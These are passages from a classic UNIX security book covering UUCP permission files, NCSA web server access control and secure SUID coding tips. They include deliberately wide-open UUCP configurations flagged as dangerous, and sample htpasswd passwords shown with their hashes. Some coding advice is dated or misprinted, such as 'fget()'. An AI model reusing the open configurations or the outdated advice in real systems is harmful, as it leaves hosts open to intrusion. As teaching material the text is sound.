will loop endlessly - calling each other, hanging up, and calling back. For more information,<br />

see the comments on callback in Chapter 14, Telephone <strong>Sec</strong>urity.<br />

15.4.2 A USERFILE Example<br />

Here is a sample USERFILE:<br />

, /usr/spool/uucppublic<br />

# Next line not needed in BSD 4.2 or 4.3<br />

nuucp, /usr/spool/uucppublic<br />

dan, /usr/spool/uucppublic /u1/dan<br />

csd, /usr/spool/uucppublic /u1/csd<br />

root, /<br />

udecwrl,decwrl /usr/spool/uucppublic /usr/spool/news<br />

upyrnj,pyrnj /usr/spool/uucppublic /usr/src<br />

As noted earlier, in some systems the first line defines both the missing username and the missing system<br />

name and gives access to the directory /usr/spool/uucppublic. In other implementations of <strong>UNIX</strong>, two<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_04.htm (4 of 7) [2002-04-12 10:44:25]


[Chapter 15] 15.4 <strong>Sec</strong>urity in Version 2 UUCP<br />

separate lines are required: The first line will suffice for the missing username, and another line, such as<br />

the second one shown here (the line beginning with nuucp), will account for the missing system name.<br />

The effect of these lines is to allow any local user, and any remote machine, to transfer files only from<br />

the public directory.<br />

If you don't have any particularly trusted sites or users, you may want to stop at this point. However, if<br />

you want to give special privileges to particular local users, you'll include lines such as the next three (the<br />

lines beginning with dan, csd, and root). Users dan and csd can transfer files to or from their home<br />

directories as well as from the public directory. Users logged in as root can transfer files to or from any<br />

directory. (This structure makes sense, as they can do anything else, including modifying USERFILE to<br />

suit their needs or whims.)<br />

Finally, you may need to specify particular permissions for known local systems. In the example, decwrl<br />

is able to transfer files to /usr/spool/news as well as to the public directory. The site pyrnj is able to<br />

transfer files to and from /usr/src as well as to and from the public directory.<br />

15.4.2.1 Some bad examples<br />

If you are not very concerned about security, the following USERFILE might suffice:<br />

# A wide open USERFILE<br />

nuucp, /usr/spool/uucppublic<br />

, /<br />

However, we recommend against it! This USERFILE will allow remote systems (assuming that they all<br />

log in as nuucp) to transfer files to or from the public directory, but will give complete UUCP access to<br />

local users. This is dangerous and is not recommended, as it allows local users access to any protected<br />

file and directory that is owned by uucp.<br />

If you don't talk to the outside world and are using UUCP only for communication with <strong>UNIX</strong> sites<br />

inside your organization, you might use the following USERFILE:<br />

# A completely open USERFILE<br />

, /<br />

, /<br />

This userfile will allow any user on your system, or any remote system, to transfer files to or from any<br />

directory. This example is even more dangerous than the previous one. (Note that on many systems, two<br />

lines are necessary, even though they are identical. The first line defines the missing username, and the<br />

other line defines the missing system name. In some systems, a single line will suffice, but you will never<br />

be wrong if you include both of them.)<br />

Remember that even with complete access specified in USERFILE, UUCP is still subject to <strong>UNIX</strong> file<br />

permissions. A user requesting outbound transfer of a file must have read access to it. For a remote<br />

system to have access to a file or directory, the file or directory must be readable and writable by all<br />

users, or by UUCP.<br />

NOTE: If you wish to run a secure system, the directory /usr/lib/uucp (or /etc/uucp) must<br />

not be in the permission list! If users from the outside are allowed to transfer into these<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_04.htm (5 of 7) [2002-04-12 10:44:25]


[Chapter 15] 15.4 <strong>Sec</strong>urity in Version 2 UUCP<br />

directories, they can change the USERFILE or the L.cmds files to allow them to execute any<br />

command that they wish. Local users can similarly use the uucp command to change these<br />

files, and subvert UUCP. Giving all access from the / directory is also dangerous - such<br />

access makes it possible for people outside your organization to subvert your system easily,<br />

as they can then modify any directory on your system that is world writable.<br />

For example, granting access to / lets an outsider read the contents of your /etc/passwd file,<br />

and also allows him to read and change the contents of your /usr/lib/uucp/L.sys file. As an<br />

added precaution, the home directory for the uucp user should not be in<br />

/usr/spool/uucp/uucppublic, or any other directory that can be written to by a uucp user.<br />

Doing so may allow an outside user to subvert your system.<br />

15.4.3 L.cmds: Providing Remote Command Execution<br />

You will probably want to limit the commands that can be executed by a remote system via uucp. After<br />

all, if any command could be executed by UUCP, then people on other computers could use the /bin/rm<br />

command to delete files in any writable directory on your computer! [7]<br />

[7] This gives a new definition to the phrase "world writable."<br />

For this reason, UUCP allows you to specify which commands remote systems are allowed to execute on<br />

your computer. The list of valid commands is contained in the directory /usr/lib/uucp in the file L.cmds,<br />

L-cmds, or uuxqtcmds (different versions store the command list in different files). Some early <strong>UNIX</strong><br />

systems (Version 7 or earlier) may not have this file at all (and have no way of changing the defaults<br />

without modifying the source code to the uuxqt program.) For further information, check your own<br />

system's documentation.<br />

In some versions of UUCP, the L.cmds file can also include a PATH= statement that specifies which<br />

directories uuxqt should check when searching for the command to execute.<br />

A typical L.cmds file might contain the following list of commands:<br />

PATH=/bin:/usr/bin:/usr/ucb<br />

rmail<br />

rnews<br />

lpr<br />

who<br />

finger<br />

If a command is not in the commands file, uux cannot execute it. L.cmds should at least contain the rmail<br />

program (the remote mail program that decides whether mail is to be delivered locally or forwarded on to<br />

yet another system). If rmail is not listed in L.cmds, a local user will not be able to receive mail from<br />

remote users via UUCP.<br />

Add commands to this file carefully; commands like cat or rm may place your system at risk. You should<br />

be careful about commands that allow shell escapes (such as man). Even finger can be dangerous if you<br />

are very concerned about security, because it might provide a cracker with a list of usernames to try<br />

when guessing passwords.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_04.htm (6 of 7) [2002-04-12 10:44:25]


[Chapter 15] 15.4 <strong>Sec</strong>urity in Version 2 UUCP<br />

Look carefully at the L.cmds file that comes with your system: you may wish to remove some of the<br />

commands that it includes. For example, some BSD-derived systems include the ruusend command in<br />

this file, which allows file forwarding. This command is a security hole, because a remote system could<br />

ask your system to forward protected files that are owned by the uucp user, such as the file L.sys.<br />

If the L.cmds file does not exist, UUCP will use a default set of commands. If the file exists but is empty,<br />

remote commands cannot be executed on your system. In this event, the UUCP system can be used only<br />

for transferring files.<br />

15.3 UUCP and <strong>Sec</strong>urity 15.5 <strong>Sec</strong>urity in BNU UUCP<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_04.htm (7 of 7) [2002-04-12 10:44:25]


[Chapter 18] 18.3 Controlling Access to Files on Your Server<br />

Chapter 18<br />

WWW <strong>Sec</strong>urity<br />

18.3 Controlling Access to Files on Your Server<br />

Many sites are interested in limiting the scope of the information that they distribute with their Web servers.<br />

This may be because a Web server is used by an organization to distribute both internal data, such as<br />

employee handbooks or phone books, and external data, such as how to reach the organization's<br />

headquarters by mass transit. To provide for this requirement, many Web servers have a system for<br />

restricting access to Web documents.<br />

The WN Server<br />

Most of this chapter discusses the NCSA and CERN servers, which are two of the most popular servers in<br />

use on the <strong>Internet</strong> at this time. A server that appears to offer considerably more security than these servers<br />

is the WN server, developed by John Franks.<br />

The WN server is a Web server designed from the ground up to provide security and flexibility. The server<br />

can perform many functions, such as banners, footers, and searching, and the selective retrieval of portions<br />

of documents, which can only be performed on other servers using CGI scripts. The server is also smaller<br />

than the NCSA and CERN servers, making it easier to validate.<br />

Another feature of the WN server is that it will not transfer any file in any directory unless that file is listed<br />

in a special index file, normally called index.cache. The index file also contains the MIME file type of each<br />

file in the directory; thus, WN eliminates the need to give your Web files extensions, such as filename.html<br />

or picture.jpeg. Automated tools are provided for creating these files, if you chose to use them.<br />

We do not have significant experience with the WN server, but its design looks promising. For more<br />

information, check http://hopf.math.nwu.edu/docs/manual.html.<br />

Most servers support two primary techniques for controlling access to files and directories:<br />

1.<br />

2.<br />

Restricting access to particular IP addresses, subnets, or DNS domains.<br />

Restricting access to particular users. Users are authenticated through the use of a password that is<br />

stored on the server.<br />

Servers that are equipped with the necessary software for public key cryptography (usually, servers that are<br />

purchased for commercial purposes) have a third technique for restricting access:<br />

1.<br />

Restricting access to users who present public keys that are signed by an appropriate certification<br />

authority.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_03.htm (1 of 6) [2002-04-12 10:44:26]


[Chapter 18] 18.3 Controlling Access to Files on Your Server<br />

Each of these techniques has advantages and disadvantages. Restricting to IP address is relatively simple<br />

within an organization, although it leaves you open to attacks based on "IP spoofing." Using hostnames,<br />

instead of IP addresses, further opens your server to the risk of DNS spoofing. And usernames and<br />

passwords, unless you use a server and clients that support encryption, are sent in the clear over the<br />

network.<br />

Of these three techniques, restricting access to people who present properly signed certificates is probably<br />

the most secure, provided that you trust your certification authority. (See below.)<br />

18.3.1 The access.conf and .htaccess Files<br />

The NCSA server allows you to place all of your global access restrictions in a single file called<br />

conf/access.conf. Alternatively, you can place the restrictions in each directory using the name specified by<br />

the AccessFileName in the configuration file conf/srm.conf. The per-directory default file name is .htaccess,<br />

but you can change this name if you wish.<br />

Whether you choose to use many access files or a single file is up to you. It is certainly more convenient to<br />

have a file in each directory. It also makes it easier to move directories within your Web server, as you do<br />

not need to update the master access control file. Furthermore, you do not need to restart your server<br />

whenever you make a change to the access control list - the server will notice that there is a new .htaccess<br />

file, and behave appropriately.<br />

On the other hand, having an access file in each directory means that there are more files that you need to<br />

check to see whether the directories are protected or not. There is also a bug with some Web servers that<br />

allows the access file to be directly fetched (see the Note below). As a result, most Web professionals<br />

recommend against per-directory access control files.<br />

The contents of the access.conf file looks like HTML. Accesses for each directory are bracketed with two<br />

tags, and . For example:<br />

<br />

<br />

order deny,allow<br />

deny from all<br />

allow from .nsa.mil<br />

<br />

<br />

If you are using the per-directory access control, do not include the and tags. For<br />

example:<br />

<br />

order deny,allow<br />

deny from all<br />

allow from .nsa.mil<br />

<br />

NOTE: There is a bug in many Web servers (including the NCSA server) that allows the<br />

.htaccess file to be fetched as a URL. This is bad, because it lets an attacker learn the details of<br />

your authentication system. For this reason, if you do use per-directory access control files,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_03.htm (2 of 6) [2002-04-12 10:44:26]


[Chapter 18] 18.3 Controlling Access to Files on Your Server<br />

give them a name other than .htaccess by specifying a different AccessFileName in the<br />

srm.conf file, as shown below:<br />

# AccessFileName: The name of the file to look for in each directory<br />

# for access control information.<br />

AccessFileName .ap<br />

18.3.2 Commands Within the Block<br />

As the above examples illustrate, a number of commands are allowed within the blocks. The<br />

commands that are useful for restricting access[2] are:<br />

[2] Other commands that can be inserted within a block can be found in NCSA's<br />

online documentation at http://hoohoo.ncsa.uiuc.edu/docs/setup/access/Overview.html.<br />

Options opt1 opt2 opt3<br />

Use the Options command for turning on or off individual options within a particular directory.<br />

Options available are FollowSymLinks (follows symbolic links), SymLinksIfOwnerMatch (follows<br />

symbolic links if the owner of the link's target is the same as the owner of the link), ExecCGI (turns<br />

on execution of CGI scripts), Includes (turns on server-side includes), Index (allows the server to<br />

respond to requests to generate a file list for the directory), and IncludesNoExec (enables server-side<br />

includes, but disables CGI scripts in the includes.)<br />

AllowOverride what<br />

Specifies which directives can be overridden with directory-based access files.<br />

AuthRealm realm<br />

Sets the name of the Authorization Realm for the directory. The name of the realm is displayed by the<br />

Web browser when it asks for a username and password.<br />

AuthType type<br />

Specifies the type of authentication used by the server. When this book was written, NCSA's httpd<br />

only supported the Basic authentication system (usernames and passwords.)<br />

AuthUserFile absolute_pathname<br />

Specifies the pathname of the httpd password file. This password file is created and maintained with<br />

the NCSA htpasswd program. This password file is not stored in the same format as /etc/passwd. The<br />

format is described in the section called "Setting up Web Users and Passwords" later in this chapter.<br />

AuthGroupFile absolute_pathname<br />

This specifies the pathname of the httpd group file. This group file is a regular text file. It is not in the<br />

format of the <strong>UNIX</strong> /etc/group file. Instead, each line begins with a group name and a colon, and then<br />

lists the members, separating each member with a space. For example:<br />

stooges: larry moe curley<br />

Limit methods to limit<br />

Begins a section that lists the limitations on the directory. In Version 1.42, this command can only be<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_03.htm (3 of 6) [2002-04-12 10:44:26]


[Chapter 18] 18.3 Controlling Access to Files on Your Server<br />

used to limit the GET and POST directives. Within the Limit section, you may have the following<br />

directives:<br />

Directive Usage Meaning<br />

order ord Specifies the order in which allow and deny statements should be<br />

checked. Specify "deny,allow" to check the deny entries first;<br />

servers that match both the "deny" and "allow" lists are allowed.<br />

Specify "allow,deny" to check the allow entries first; servers that<br />

match both are denied. Specify "mutual-failure" to cause hosts on<br />

the allow list to be allowed, those on the deny list to be denied,<br />

and all others to be denied.<br />

allow from host1 host2 Specifies hosts that are allowed access.<br />

deny from host1 host2 Specifies hosts that should be denied access.<br />

require user user1 user2 user3... require<br />

group group1 group2... require<br />

valid-user<br />

Hosts in the allow and deny statements may be any of the following:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

A domain name, such as .vineyard.net.<br />

A fully qualified host name, such as nc.vineyard.net.<br />

An IP address, such as 204.17.195.100.<br />

Specifies that access should be granted to a specific user or group.<br />

If "valid-user" is specified, then any user that appears in the user<br />

file will be allowed.<br />

A partial IP address, such as 204.17.195, which matches any host on the subnet.<br />

The keyword "all," which matches all hosts.<br />

18.3.2.1 Examples<br />

For example, if you wish to restrict access to a directory's files to everyone on the subnet 204.17.195.*, you<br />

could add the following lines to your access.conf file:<br />

<br />

<br />

order deny,allow<br />

deny from all<br />

allow from 204.17.195<br />

<br />

<br />

If you then wanted to allow only the authenticated users beth and simson to access the files, and only when<br />

they are on subnet 204.17.195, you could add these lines:<br />

AuthType Basic<br />

AuthName The-T-Directory<br />

AuthUserFile /tmp/auth<br />

<br />

order deny,allow<br />

deny from all<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_03.htm (4 of 6) [2002-04-12 10:44:26]


[Chapter 18] 18.3 Controlling Access to Files on Your Server<br />

allow from 204.17.195<br />

require user simson beth<br />

<br />

Of course, the first three lines could as easily go in the server's access.conf file.<br />

If you wish to allow the users beth and simson to access the files from anywhere on the <strong>Internet</strong>, provided<br />

that they type the correct username and password, try this:<br />

AuthType Basic<br />

AuthName The-T-Directory<br />

AuthUserFile /tmp/auth<br />

<br />

require user simson beth<br />

<br />

18.3.3 Setting Up Web Users and Passwords<br />

To use authenticated users, you will need to create a password file. You can do this with the htpasswd<br />

program, using the -c option to create the file. For example:<br />

# ./htpasswd -c /usr/local/etc/httpd/pw/auth simsong<br />

Adding password for simsong.<br />

New password:foo1234<br />

Re-type new password:foo1234<br />

#<br />

You can add additional users and passwords with the htpasswd program. When you add additional users, do<br />

not use the -c option, or you will erase all of the users who are currently in the file:<br />

# ./htpasswd /usr/local/etc/httpd/pw/auth beth<br />

Adding password for beth.<br />

New password:luvsim<br />

Re-type new password:luvsim<br />

#<br />

The password file is similar, but not identical, to the standard /etc/passwd file:<br />

# cat /usr/local/etc/httpd/pw/auth<br />

simsong:ZdZ2f8MOeVcNY<br />

beth:ukJTIFYWHKwtA<br />

#<br />

Because the Web server uses crypt ( )-style passwords, it is important that the password file be inaccessible<br />

to normal users on the server (and to users over the Web) to prevent an ambitious attacker from trying to<br />

guess passwords using a program such as Crack.<br />

18.2 Running a <strong>Sec</strong>ure Server 18.4 Avoiding the Risks of<br />

Eavesdropping<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_03.htm (5 of 6) [2002-04-12 10:44:26]


[Chapter 18] 18.3 Controlling Access to Files on Your Server<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch18_03.htm (6 of 6) [2002-04-12 10:44:26]


[Chapter 23] 23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Chapter 23<br />

Writing <strong>Sec</strong>ure SUID and<br />

Network Programs<br />

23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Software engineers define errors as mistakes made by humans when designing and coding software.<br />

Faults are manifestations of errors in programs that may result in failures. Failures are deviations from<br />

program specifications. In common usage, faults are called bugs.<br />

Why do we bother to explain these formal terms? For three reasons:<br />

1.<br />

2.<br />

3.<br />

To remind you that although bugs (faults) may be present in the code, they aren't necessarily a<br />

problem until they trigger a failure. Testing is designed to trigger such a failure before the program<br />

becomes operational...and results in damage.<br />

Bugs don't suddenly appear in code. They are there because some person made a mistake - from<br />

ignorance, from haste, from carelessness, or for some other reason. Ultimately, unintentional flaws<br />

that allow someone to compromise your system are caused by people who made errors.<br />

Almost every piece of <strong>UNIX</strong> software has been developed without comprehensive specifications.<br />

As a result, you cannot easily tell when a program has actually failed. Indeed, what appears to be a<br />

bug to users of the program might be a feature that was intentionally planned by the program's<br />

authors.[5]<br />

[5] "It's not a bug, it's a feature!"<br />

When you write a program that will run as superuser or in some other critical context, you must try to<br />

make the program as bug free as possible because a bug in a program that runs as superuser can leave<br />

your entire computer system wide open.<br />

Of course, no program can be guaranteed perfect. A library routine can be faulty, or a stray gamma ray<br />

may flip a bit in memory to cause your program to misbehave. Nevertheless, there are a variety of<br />

techniques that you can employ when writing programs that will tend to minimize the security<br />

implications of any bugs that may be present. You can also program defensively to try to counter any<br />

problems that you can't anticipate now.<br />

Here are some general rules to code by:<br />

1.<br />

Carefully design the program before you start.<br />

Be certain that you understand what you are trying to build. Carefully consider the environment in<br />

which it will run, the input and output behavior, files used, arguments recognized, signals caught,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_02.htm (1 of 8) [2002-04-12 10:44:26]


[Chapter 23] 23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

2.<br />

3.<br />

and other aspects of behavior. Try to list all of the errors that might occur, and how you will deal<br />

with them. Consider writing a specification document for the code. If you can't or won't do that, at<br />

least consider writing documentation including a complete manual page before you write any code.<br />

That can serve as a valuable exercise to focus your thoughts on the code and its intended behavior.<br />

Check all of your arguments.<br />

An astonishing number of security-related bugs arise because an attacker sends an unexpected<br />

argument or an argument with unanticipated format to a program or a function within a program.<br />

A simple way to avoid these kinds of problems is by having your program always check all of its<br />

arguments. Argument checking will not noticeably slow down most programs, but it will make<br />

them less susceptible to hostile users. As an added benefit, argument checking and error reporting<br />

will make the process of catching non-security-related bugs easier.<br />

When you are checking arguments in your program, pay extra attention to the following:<br />

❍<br />

❍<br />

❍<br />

❍<br />

Check arguments passed to your program on the command line. Check to make sure that<br />

each command-line argument is properly formed and bounded.<br />

Check arguments that you pass to <strong>UNIX</strong> system functions. Even though your program is<br />

calling the system function, you should check the arguments to be sure that they are what<br />

you expect them to be. For example, if you think that your program is opening a file in the<br />

current directory, you might want to use the index( ) function to see if the filename contains<br />

a slash character (/). If the file does contain the slash, and it shouldn't, the program should<br />

not open the file.<br />

Check arguments passed in environment variables to your program, including general<br />

environment variables and such variables as the LESS argument.<br />

Do bounds checking on every variable. If you only define an option as valid from 1 to 5, be<br />

sure that no one tries to set it to 0, 6, -1, 32767, or 32768. If string arguments are supposed<br />

to be 16 bytes or less, check the length before you copy them into a local buffer (and don't<br />

forget the room required for the terminating null byte). If you are supposed to have three<br />

arguments, be sure you got three.<br />

Don't use routines that fail to check buffer boundaries when manipulating strings of arbitrary<br />

length.<br />

In the C programming language particularly, note the following:<br />

Avoid Use Instead<br />

gets() fget()<br />

strcpy() strncpy()<br />

strcat() strncat()<br />

Use the following library calls with great care - they can overflow either a destination buffer or an<br />

internal, static buffer on some systems if the input is "cooked" to do so: [6] sprintf( ), fscanf( ),<br />

scanf( ), sscanf( ), vsprintf( ), realpath( ), getopt( ), getpass( ), streadd( ), strecpy( ), and strtrns( ).<br />

Check to make sure that you have the version of the syslog() library which checks the length of its<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_02.htm (2 of 8) [2002-04-12 10:44:26]


[Chapter 23] 23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

4.<br />

arguments.<br />

[6] Not all of these will be available under every version of <strong>UNIX</strong>.<br />

There may be other routines in libraries on your system of which you should be somewhat<br />

cautious. Note carefully if a copy or transformation is performed into a string argument without<br />

benefit of a length parameter to delimit it. Also note if the documentation for a function says that<br />

the routine returns a pointer to a result in static storage. If an attacker can provide the necessary<br />

input to overflow these buffers, you may have a major problem.<br />

Check all return codes from system calls.<br />

The <strong>UNIX</strong> operating system has almost every single system call provide a return code. Even<br />

system calls that you think cannot fail, such as write(), chdir(), or chown(), can fail under<br />

exceptional circumstances and return appropriate return codes.<br />

When Good Calls Fail<br />

You may not believe that system calls can fail for a program that is running as root. For instance,<br />

you might not believe that a chdir() call could fail, as root has permission to change into any<br />

directory. However, if the directory in question is mounted via NFS, root has no special privileges.<br />

The directory might not exist, again causing the chdir() call to fail. If the target program is started<br />

in the wrong directory and you fail to check the return codes, the results will not be what you<br />

expected when you wrote the code.<br />

Or consider the open() call. It can fail for root, too. For example, you can't open a file on a<br />

CD-ROM for writing, because CD-ROM is a read-only media. Or consider someone creating<br />

several thousand zero-length files to use up all the inodes on the disk. Even root can't create a file<br />

if all the fre inodes are gone.<br />

The fork($a) system call may fail if the process table is full, exec() may fail if the swap space is<br />

exhausted, and sbrk() (the call which allocates memory for malloc( )) may fail if a process has<br />

already allocated the maximum amount of memory allowed by process limits. An attacker can<br />

easily arrange for these cases to occur. The difference between a safe and an unsafe program may<br />

be how that program deals with these situations.<br />

If you don't like to type explicit checks for each call, then consider writing a set of macros to<br />

"wrap" the calls and do it for you. You will need one macro for calls that return -1 on failure, and<br />

another for calls that return 0 on failure.<br />

Here are some macros that you may find helpful:<br />

#include <br />

#define Call0(s) assert((s) != 0)<br />

#define Call1(s) assert((s) >= 0)<br />

Here is how to use them:<br />

Call0(fd =open("foo", O_RDWR, 0666));<br />

Note, however, that these simply cause the program to terminate without any cleanup. You may<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_02.htm (3 of 8) [2002-04-12 10:44:26]


[Chapter 23] 23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

5.<br />

6.<br />

7.<br />

prefer to change the macros to call some common routine first to do cleanup and logging.<br />

When the calls fail, check the errno variable to determine why they failed. Have your program log<br />

the unexpected value and then cleanly terminate if the system call fails for any unexpected reason.<br />

This approach will be a great help in tracking down problems later on.<br />

If you think that a system call should not fail and it does, do something appropriate. If you can't<br />

think of anything appropriate to do, then have your program delete all of its temporary files and<br />

exit.<br />

Don't design your program to depend on <strong>UNIX</strong> environment variables.<br />

The simplest way to write a secure program is to make absolutely no assumptions about your<br />

environment and to set everything explicitly (e.g. signals, umask, current directory, environment<br />

variables). A common way of attacking programs is to make changes in the runtime environment<br />

that the programmer did not anticipate.<br />

Thus, you want to make certain that your program environment is in a known state. Here are some<br />

of the things you want to do:<br />

❍<br />

❍<br />

❍<br />

❍<br />

❍<br />

❍<br />

❍<br />

❍<br />

If you absolutely must pass information to the program in its environment, then have your<br />

program test for the necessary environment variables and then erase the environment<br />

completely.<br />

Otherwise, wipe the environment clean of all but the most essential variables. On most<br />

systems, this is the TZ variable that specifies the local time zone, and possibly some<br />

variables to indicate locale. Cleaning the environment avoids any possible interactions<br />

between it and the <strong>UNIX</strong> system libraries.<br />

You might also consider constructing a new envp and passing that to exec(), rather than<br />

using even a scrubbed original envp. Doing so is safer because you explicitly create the<br />

environment rather than trying to clean it.<br />

Make sure that the file descriptors that you expect to be open are open, and that the file<br />

descriptors you expect to be closed are closed.<br />

Ensure that your signals are set to a sensible state.<br />

Set your umask appropriately.<br />

Explicitly chdir() to an appropriate directory when the program starts.<br />

Set whatever limit values are necessary so that your program will not leave a core file if it<br />

fails. Consider setting your other limits on number of files and stack size to appropriate<br />

values if they might not be appropriate at program start.<br />

Have internal consistency-checking code.<br />

Use the assert macro if you are programming in C. If you have a variable that you know should<br />

either be a 1 or a 2, then your program should not be running if the variable is anything else.<br />

Include lots of logging.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_02.htm (4 of 8) [2002-04-12 10:44:26]


[Chapter 23] 23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

8.<br />

9.<br />

10.<br />

11.<br />

12.<br />

You are almost always better having too much logging rather than too little. Report your log<br />

information into a dedicated log file. Or, consider using the syslog facility, so that logs can be<br />

redirected to users or files, piped to programs, and/or sent to other machines. And remember to do<br />

bounds checking on arguments passed to syslog() to avoid buffer overflows.<br />

Here is specific information that you might wish to log:<br />

❍<br />

❍<br />

❍<br />

❍<br />

❍<br />

❍<br />

❍<br />

❍<br />

The time that the program was run.<br />

The UID and effective UID of the process.<br />

The GID and effective GID of the process.<br />

The terminal from which it was run.<br />

The process number (PID).<br />

Command-line arguments.<br />

Invalid arguments, or failures in consistency checking.<br />

The host from which the request came (in the case of network servers).<br />

Make the critical portion of your program as small and as simple as possible.<br />

Read through your code.<br />

Think of how you might attack it yourself. What happens if the program gets unexpected input?<br />

What happens if you are able to delay the program between two system calls?<br />

Always use full pathnames for any filename argument, for both commands and data files.<br />

Check anything supplied by the user for shell meta characters if the user-supplied input is passed<br />

on to another program, written into a file, or used as a filename. In general, checking for good<br />

characters is safer than checking for a set of "bad characters" and is not that restrictive in most<br />

situations.<br />

Examine your code and test it carefully for assumptions about the operating environments. For<br />

example:<br />

❍<br />

❍<br />

❍<br />

If you assume that the program is always run by somebody who is not root, what happens if<br />

the program is run by root? (Many programs designed to be run as daemon or bin can cause<br />

security problems when run as root, for instance.)<br />

If you assume that it will be run by root, what happens if it is not run as root?<br />

If you assume that a program always runs in the /tmp or /tmp/root [7] directory, what<br />

happens if it is run somewhere else?<br />

[7] We use /tmp/root, with the understanding that youhave a directory /tmp/root<br />

automatically created by your start-up scripts, and that this directory has a<br />

mode of 0700. Your /tmp directory should have mode 1777, which prevents<br />

ordinary users from deleting the /tmp/root directory.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_02.htm (5 of 8) [2002-04-12 10:44:26]


[Chapter 23] 23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

13.<br />

14.<br />

15.<br />

16.<br />

17.<br />

18.<br />

Make good use of available tools.<br />

If you are using C and have an ANSI C compiler available, use it, and use prototypes for calls. If<br />

you don't have an ANSI C compiler, then be sure to use the -Wall option to your C compiler (if<br />

supported) or the lint program to check for common mistakes.<br />

Test your program thoroughly.<br />

If you have a system based on SVR4, consider using (at the least) tcov, a statement-coverage<br />

tester. Consider using commercial products, such as CodeCenter and Purify (from personal<br />

experience, we can tell you that these programs are very useful). Look into GCT, a test tool<br />

developed by Brian Marick at the University of Illinois.[8] Remember that finding a bug in testing<br />

is better than letting some anonymous system cracker find it for you!<br />

[8] Available for FTP from ftp.cs.uiuc.edu.<br />

Be aware of race conditions. These can be manifest as a deadlock, or as failure of two calls to<br />

execute in close sequence.<br />

❍<br />

❍<br />

Deadlock conditions. Remember: more than one copy of your program may be running at<br />

the same time. Consider using file locking for any files that you modify. Provide a way to<br />

recover the locks in the event that the program crashes while a lock is held. Avoid deadlocks<br />

or "deadly embraces," which can occur when one program attempts to lock file A then file<br />

B, while another program already holds a lock for file B and then attempts to lock file A.<br />

Sequence conditions . Be aware that your program does not execute atomically. That is, the<br />

program can be interrupted between any two operations to let another program run for a<br />

while - including one that is trying to abuse yours. Thus, check your code carefully for any<br />

pair of operations that might fail if arbitrary code is executed between them.<br />

In particular, when you are performing a series of operations on a file, such as changing its<br />

owner, stat'ing the file, or changing its mode, first open the file and then use the fchown(),<br />

fstat(), or fchmod() system calls. Doing so will prevent the file from being replaced while<br />

your program is running (a possible race condition). Also avoid the use of the access()<br />

function to determine your ability to access a file: Using the access() function followed by<br />

an open() is a race condition, and almost always a bug.<br />

Don't have your program dump core except during your testing.<br />

Core files can fill up a filesystem. Core files can contain confidential information. In some cases,<br />

an attacker can actually use the fact that a program dumps core to break into a system. Instead of<br />

dumping core, have your program log the appropriate problem and exit. Use the setrlimit()<br />

function to limit the size of the core file to 0.<br />

Do not provide shell escapes (with job control, they are no longer needed).<br />

Never use system() or popen() calls.<br />

Both invoke the shell, and can have unexpected results when they are passed arguments with<br />

funny characters, or in cases in which environment variables have peculiar definitions.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_02.htm (6 of 8) [2002-04-12 10:44:26]


[Chapter 23] 23.2 Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

19.<br />

20.<br />

21.<br />

22.<br />

23.<br />

24.<br />

If you are expecting to create a new file with the open call, then use the O_EXCL | O_CREAT<br />

flags to cause the routine to fail if the file exists.<br />

If you expect the file to be there, be sure to omit the O_CREAT flag so that the routine will fail if<br />

the file is not there.[9]<br />

[9] Note that on some systems, if the pathname in the open call refers to a symbolic<br />

link that names a file that does not exist, the call may not behave as you expect. This<br />

scenario should be tested on your system so you know what to expect.<br />

If you think that a file should be a file, use lstat() to make sure that it is not a link.<br />

However, remember that what you check may change before you can get around to opening it if it<br />

is in a public directory. (See item )<br />

If you need to create a temporary file, consider using the tmpfile( ) or mktemp( ) function.<br />

This step will create a temporary file, open the file, delete the file, and return a file handle. The<br />

open file can be passed to a subprocess created with fork( ) and exec( ), but the contents of the file<br />

cannot be read by any other program on the system. The space associated with the file will<br />

automatically be returned to the operating system when your program exits. If possible, create the<br />

temporary file in a closed directory, such as /tmp/root/.<br />

NOTE: The mktemp() library call is not safe to use in a program that is running with<br />

extra privilege. The code as provided on most versions of <strong>UNIX</strong> has a race condition<br />

between a file test and a file open. This condition is a well-known problem, and<br />

relatively easy to exploit. Avoid the standard mktemp() call.<br />

Do not create files in world-writable directories.<br />

Have your code reviewed by another competent programmer (or two, or more).<br />
